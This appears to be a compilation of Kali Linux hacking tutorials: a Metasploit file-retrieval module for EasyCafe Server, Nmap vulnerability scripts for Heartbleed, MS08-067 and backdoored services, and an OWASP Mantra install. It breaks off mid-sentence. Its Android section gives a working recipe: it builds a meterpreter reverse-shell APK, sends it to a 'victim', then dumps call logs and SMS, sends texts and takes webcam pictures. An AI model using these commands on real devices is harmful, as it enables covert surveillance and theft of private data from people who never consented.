Finding Vulnerability in EasyCafe Server using Metasploit

This module exploits file retrieval vulnerability in EasyCafe Server. The vulnerability can be triggered by sending a specially crafted packet (opcode 0x43) to the 831/TCP port. This module has been successfully tested on EasyCafe Server version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3 and Windows 7 SP1. Note that the server will throw a popup messagebox if the specified file does not exist.

Exploit Targets

EasyCafe Server version 2.2.14

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use auxiliary/scanner/misc/easycafe_server_fileaccess

msf exploit (easycafe_server_fileaccess)>set rhosts 192.168.0.103

msf exploit (easycafe_server_fileaccess)>set rport 831

msf exploit (easycafe_server_fileaccess)>exploit

The result will be saved on /root/.msf4/ directory

Finding Vulnerability in Server/Client using Nmap

Heartbleed bug

The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected by the SSL/TLS encryption used to secure the Internet.  

Open terminal in kali

nmap --script=ssl-heartbleed 192.168.0.114

Check the output from Nmap to see whether the server is vulnerable or not

Poodle Bug

The POODLE attack is a man-in-the-middle exploit which takes advantage of Internet and security software clients' fallback to SSL 3.0.  -“Wikipedia”.

Open terminal in kali

nmap  --script  ssl-poodle 192.168.0.114

IRC Backdoor

Checks if an IRC server is backdoored by running a time-based command (ping) and checking how long it takes to respond. This script can be used to run an arbitrary command on the remote system. 

Open terminal in kali

nmap -sV --script=irc-unrealircd-backdoor  -p 6667 192.168.1.6

 MS08-67 Vulnerability

Detects Microsoft Windows systems vulnerable to the remote code execution vulnerability known as MS08-067. This check is dangerous and it may crash systems.

Open terminal in kali

nmap  --script  smb-vuln-ms08-067  -p 445  192.168.0.114

RDP Vulnerability

Checks if a machine is vulnerable to MS12-020. RDP vulnerability addresses a denial of service vulnerability inside Terminal Server.

  

nmap -sV --script=rdp-ms12-020  -p 3389 192.168.0.114

Vsftpd Backdoor

Tests for the presence of the vsFTPd 2.3.4 backdoor reported CVE-2011-2523. This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the exploit.cmd or ftp-vsftpd-backdoor.cmd script arguments.

nmap --script ftp-vsftpd-backdoor  -p 21  192.168.1.6

For More Info visit here .

Hack Wallpaper of Remote Android Phone using Metasploit

This module will set the desktop wallpaper background on the specified session. The method of setting the wallpaper depends on the platform type.

First Hack the Victim Android Phone Using Metasploit (Tutorial How to Hack Remote PC)

msf > use post/multi/manage/set_wallpaper

msf post (set_wallpaper)>set WALLPAPER_FILE  /root/Desktop/hack.jpg

msf post (set_wallpaper)>set session 1

msf post (set_wallpaper)>exploit

Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit

In this article, we will learn how to hack an android device and exploit it according to one’s desires. Android is an operating system based on linux kernel.   It uses APK file format to install any application. Hence, our malware will also be in APK format. To construct the malware use the following msfvenom command :

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 > shell.apk

As the msfvenom malware is created, start the handler in order to have a session and for this type :

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.1.109

set lport 1234

exploit

Once the exploit is executed, send the APK file to the victim and make sure to run the file in their android phone. As the said file will run, you will have session as shown in the image below :

Now, there are various commands to further exploit your victim’s device. We will show you practical of some of the major commands and all of these commands are shown in the image below :

You can check whether the device is rooted or not by using the following command :

check_root

You can also dump all the call-logs by using following command ;

dump_calllog

The above command will generate a TXT file with all the detailed list of call logs. Use the following command to read its contents :

cat

You can also send any kind of SMS from the device, remotely, with the following command :

send_sms -d 9599387847 -t hacked

You can even use the following command to capture a picture :

webcam_snap

It will save the picture in to JPEG file.

Similar to dumping the call logs, you can also dump all the SMSs will the following command :

dump_sms

And then you can read the sms dump file using cat command as shown in the image below :

This way, you can exploit android as the way you like it.

Setup Browser Based Framework for Web Penetration Testing in Kali Linux (Mantra Toolkit)

OWASP Mantra - Free and Open Source Browser based Security Framework, is a collection of free and open source tools integrated into a web browser, which can become handy for penetration testers, web application developers, security professionals etc.

OWASP Mantra provides:

·         A web application security testing framework built on top of a browser.

·         Supports Windows, Linux(both 32 and 64 bit) and Macintosh.

·         Can work with other software likeZAP using built in proxy management function which makes it much more convenient.

·         Available in 9 languages: Arabic, Chinese - Simplified, Chinese - Traditional, English, French, Portuguese, Russian, Spanish and Turkish

·         Comes installed with major security distributions including BackTrack and Matriux

Open your kali Linux terminal and type

apt-get install owasp-mantra-ff

After installing the setup again open your terminal and type

owasp-mantra-ff

Now we can access all the tools that OWASP Mantra